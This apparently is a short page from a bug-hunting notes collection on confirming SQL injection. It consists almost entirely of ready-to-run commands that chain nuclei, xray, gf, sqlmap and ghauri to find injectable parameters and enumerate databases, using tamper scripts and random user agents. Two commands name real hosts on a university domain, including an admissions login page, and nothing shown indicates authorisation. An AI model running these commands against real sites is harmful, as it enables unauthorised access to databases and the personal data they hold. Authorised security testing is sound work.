SQL injection

confirm SQL injection

cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/sqli/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1"

./xray_linux_amd64 ws --basic https://pl.neduet.edu.pk/ --plugin sqldet --html-output Generic-Vulnerabilities.html && chmod 777 Generic-Vulnerabilities.html

cat check.txt | gf sqli > check-sql.txt; sqlmap -m check-sql.txt --batch --dbs --level 5 --random-agent | tee -a confirm-sqli.txt

ghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent --level=3 --dbs

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --batch --banner --current-db --level 3
done < check.txt


while read url; do
    echo "Testing URL: $url"
    yes n | sqlmap -u "$url" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment
done < check.txt

PreviousOpen Redirect NextLocal file inclusion (LFI)

Last updated 1 month ago